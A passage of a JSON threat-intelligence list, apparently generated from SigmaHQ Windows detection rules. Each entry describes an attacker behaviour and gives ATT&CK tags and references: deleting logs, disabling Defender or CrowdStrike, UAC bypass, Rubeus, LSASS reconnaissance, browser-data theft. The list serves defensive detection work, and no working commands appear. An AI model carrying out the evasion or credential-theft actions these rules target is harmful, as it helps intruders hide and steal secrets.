Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Possible FP during log rotation" ], "filename": "file_delete_win_delete_exchange_powershell_logs.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { 
"dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "value": "Exchange PowerShell Cmdlet History Deleted" }, { "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-07-01", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml", "level": "high", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/cube0x0/CVE-2021-1675", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574", "cve.2021-1675" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "value": "Potential PrintNightmare Exploitation Attempt" }, { "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_teamviewer_logs.yml", "level": "low", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", "value": "TeamViewer Log File Deleted" }, { "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_event_log_files.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "value": "EventLog EVTX File Deleted" }, { "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-16", "falsepositive": [ "During uninstallation of the tomcat server", "During log rotation" ], "filename": "file_delete_win_delete_tomcat_logs.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://linuxhint.com/view-tomcat-logs-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "value": "Tomcat WebServer Logs Deleted" }, { "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Legitimate usage of SDelete" ], "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/9", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "value": "File Deleted Via Sysinternals SDelete" }, { "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_powershell_command_history.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff301988-c231-4bd0-834c-ac9d73b86586", "value": "PowerShell Console History Logs Deleted" }, { "description": "Detects the creation of a binary file with the \".sed\" extension. The \".sed\" extension stands for Self Extraction Directive files.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nUsually \".sed\" files are simple ini files and not PE binaries.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-02-05", "falsepositive": [ "Unknown" ], "filename": "file_executable_detected_win_susp_embeded_sed_file.yml", "level": "medium", "logsource.category": "file_executable_detected", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab90dab8-c7da-4010-9193-563528cfa347", "value": "Potentially Suspicious Self Extraction Directive File Created" }, { "description": "Detects the use of register-cimprovider.exe to execute an arbitrary DLL file.", "meta": { "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_registry_cimprovider_dll_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", "https://twitter.com/PhilipTsukerman/status/992021361106268161", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", "value": "DLL Execution Via Register-cimprovider.exe" }, { "description": "Detects execution of the Windows Kernel Debugger \"kd.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Rare occasions of legitimate cases where kernel debugging is necessary in production. 
Investigation is required" ], "filename": "proc_creation_win_kd_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kd_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "27ee9438-90dc-4bef-904b-d3ef927f5e7e", "value": "Windows Kernel Debugger Execution" }, { "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_mount_internet_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "value": "Windows Internet Hosted WebDav Share Mount Via Net.EXE" }, { "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", "meta": { "author": "frack113", "creation_date": "2021-07-12", "falsepositive": [ "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" ], "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "value": "Uninstall Crowdstrike Falcon Sensor" }, { "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-03", "falsepositive": [ "Possible administrative activity", "Other Cmdlets that may use the same parameters" ], "filename": "proc_creation_win_powershell_defender_disable_feature.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"1ec65a5f-9473-4f12-97da-622044d6df21", "value": "Powershell Defender Disable Scan Feature" }, { "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "value": "UAC Bypass Using ChangePK and SLUI" }, { "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_utilityfunctions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"0403d67d-6227-4ea8-8145-4e72db7da120", "value": "UtilityFunctions.ps1 Proxy Dll" }, { "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_sysnative.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysnative.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "value": "Process Creation Using Sysnative Folder" }, { "description": "Detects usage of \"cmdkey.exe\" to add generic credentials.\nAs an example, this can be used before connecting to an RDP session via command line interface.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-03", "falsepositive": [ "Legitimate usage for administration purposes" ], "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml" ], "tags": [ "attack.credential-access", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "value": "New Generic Credentials Added Via Cmdkey.EXE" }, { "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", "meta": { "author": "Kirill Kiryanov, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", "value": "Sysmon Driver Unloaded Via Fltmc.EXE" }, { "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", "meta": { "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-12-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rar_susp_greedy_compression.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://decoded.avast.io/martinchlumecky/png-steganography", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb", "value": "Suspicious Greedy Compression Using Rar.EXE" }, { "description": "Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_wsudo_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/M2Team/Privexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "value": "PUA - Wsudo Suspicious Execution" }, { "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_esentutl_webcache.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "value": "Esentutl Steals Browser Information" }, { "description": "Detects the execution of AdvancedRun utility", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_advancedrun.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/operation-bleeding-bear", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://twitter.com/splinter_code/status/1483815103279603714", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1564.003", "attack.t1134.002", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "value": "PUA - AdvancedRun Execution" }, { "description": "Detects the execution of \"AccCheckConsole\", a command-line tool for verifying the accessibility implementation of an application's UI.\nOne of the tests that this checker can run is called a \"verification routine\", which tests for things like Consistency, Navigation, etc.\nThe tool allows a user to provide a DLL that can contain a custom \"verification routine\". An attacker can build such DLLs and pass them via the CLI, which would then be loaded in the context of the \"AccCheckConsole\" utility.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-06", "falsepositive": [ "Legitimate use of the UI Accessibility Checker" ], "filename": "proc_creation_win_acccheckconsole_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml" ], "tags": [ "attack.execution", "detection.threat-hunting" ] }, "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", "value": "Potential DLL Injection Via AccCheckConsole" }, { "description": "Detects findstr commands that include the keyword lsass, which indicates recon activity for the LSASS process PID", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "value": "LSASS Process Reconnaissance Via Findstr.EXE" }, { "description": "Detects suspicious Splwow64.exe process without any command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_splwow64_cli_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "value": "Suspicious Splwow64 Without Params" }, { "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nao_sec/status/1530196847679401984", 
"https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", "value": "Potential Arbitrary Command Execution Using Msdt.EXE" }, { "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-21", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_rundll32_keymgr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/NinjaParanoid/status/1516442028963659777", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "value": "Suspicious Key Manager Access" }, { "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-12-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_rubeus.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", "https://github.com/GhostPack/Rubeus", 
"https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "value": "HackTool - Rubeus Execution" }, { "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", "meta": { "author": "TropChaud", "creation_date": "2023-01-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_system_info_uncommon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/", "https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior", "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/", "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar", 
"https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d5a1274-922a-49d0-87f3-8c653483b909", "value": "Uncommon System Information Discovery Via Wmic.EXE" }, { "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute a script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False positives might occur with legitimate or uncommon extensions used internally. Initial baseline is required." ], "filename": "proc_creation_win_diskshadow_script_mode_susp_ext.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", 